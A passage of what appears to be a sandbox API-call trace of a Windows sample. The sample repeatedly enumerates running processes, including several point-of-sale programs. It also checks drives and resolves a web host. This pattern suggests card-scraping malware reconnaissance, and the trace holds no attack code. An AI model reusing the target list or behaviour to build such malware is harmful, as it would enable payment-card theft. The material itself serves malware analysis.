dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0054.411] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xce0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0054.411] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0054.412] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0054.413] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0054.447] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0054.448] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0054.449] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0054.449] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="consistseq.exe")) returned 1 [0054.450] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.451] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.452] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.453] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0054.454] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0054.455] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0054.455] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0054.456] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1174, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.457] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1164, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.458] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.459] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x13c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="osggoz.exe")) returned 1 [0054.460] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.461] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x13c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0054.461] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.462] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0054.463] CloseHandle (hObject=0x2c4) returned 1 [0054.463] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2cc [0054.474] Process32First (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.475] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.475] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.477] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.478] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.478] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.479] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.480] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.481] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.482] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.483] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.484] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.484] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.485] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.486] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.487] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.488] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.489] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.490] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.602] CloseHandle (hObject=0x2cc) returned 1 [0054.602] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2c4 [0054.613] Process32First (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.845] CloseHandle (hObject=0x2c4) returned 1 [0054.845] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2cc [0054.856] Process32First (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.092] CloseHandle (hObject=0x2cc) returned 1 [0055.093] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2c4 [0055.139] Process32First (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.279] CloseHandle (hObject=0x2c4) returned 1 [0055.279] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2cc [0055.290] Process32First (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.544] CloseHandle (hObject=0x2cc) returned 1 [0055.544] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2c4 [0055.565] Process32First (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.792] CloseHandle (hObject=0x2c4) returned 1 [0055.792] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2cc [0055.826] Process32First (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.131] CloseHandle (hObject=0x2cc) returned 1 [0056.131] GetLogicalDrives () returned 0x4 [0056.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e0) returned 0x5eca0 [0056.131] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0056.131] AreFileApisANSI () returned 1 [0056.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x118f830, cbMultiByte=-1, lpWideCharStr=0x118e0e4, cchWideChar=260 | out: lpWideCharStr="C:\\") returned 4 [0056.131] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x118e2ac, lpTotalNumberOfBytes=0x118e2bc, lpTotalNumberOfFreeBytes=0x118e2b4 | out: lpFreeBytesAvailableToCaller=0x118e2ac, lpTotalNumberOfBytes=0x118e2bc, lpTotalNumberOfFreeBytes=0x118e2b4) returned 1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] GetDriveTypeA (lpRootPathName="") returned 0x1 [0056.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5eca0 | out: hHeap=0x20000) returned 1 [0056.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0056.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x72188 [0056.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x210) returned 0x87e48 [0056.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0056.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886f8 [0056.133] inet_addr (cp="www.sfml-dev.org") returned 0xffffffff [0056.134] getaddrinfo (in: pNodeName="www.sfml-dev.org", pServiceName=0x0, pHints=0x118df1c*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x118df44 | out: ppResult=0x118df44*=0x887c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d330*(sa_family=2, sin_port=0x0, sin_addr="148.251.247.174"), ai_next=0x0)) returned 0 [0058.191] FreeAddrInfoW (pAddrInfo=0x887c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d330*(sa_family=2, sin_port=0x0, sin_addr="148.251.247.174"), ai_next=0x0)) [0058.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88590 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0058.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88590 | out: hHeap=0x20000) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883d8 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0058.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883d8 | out: hHeap=0x20000) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88590 [0058.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0058.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce80 [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce60 [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cdf0 [0058.192] GetLastError () returned 0x0 [0058.192] SetLastError (dwErrCode=0x0) [0058.192] GetLastError () returned 0x0 [0058.192] SetLastError (dwErrCode=0x0) [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x59b50 [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b40 | out: hHeap=0x20000) returned 1 [0058.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0058.192] GetLastError () returned 0x0 [0058.192] SetLastError (dwErrCode=0x0) [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7ce70 [0058.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cea0 [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7ced0 [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x59b50 | out: hHeap=0x20000) returned 1 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ced0 | out: hHeap=0x20000) returned 1 [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7ce70 [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7ced0 [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7cce0 [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x59b50 [0058.193] GetLastError () returned 0x0 [0058.193] SetLastError (dwErrCode=0x0) [0058.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0058.194] GetLastError () returned 0x0 [0058.194] SetLastError (dwErrCode=0x0) [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7ce70 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ced0 | out: hHeap=0x20000) returned 1 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cea0 | out: hHeap=0x20000) returned 1 [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cea0 [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x6f588 [0058.194] GetLastError () returned 0x0 [0058.194] SetLastError (dwErrCode=0x0) [0058.194] GetLastError () returned 0x0 [0058.194] SetLastError (dwErrCode=0x0) [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x59b50 | out: hHeap=0x20000) returned 1 [0058.194] GetLastError () returned 0x0 [0058.194] SetLastError (dwErrCode=0x0) [0058.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7ce70 [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7ced0 [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7cce0 [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) 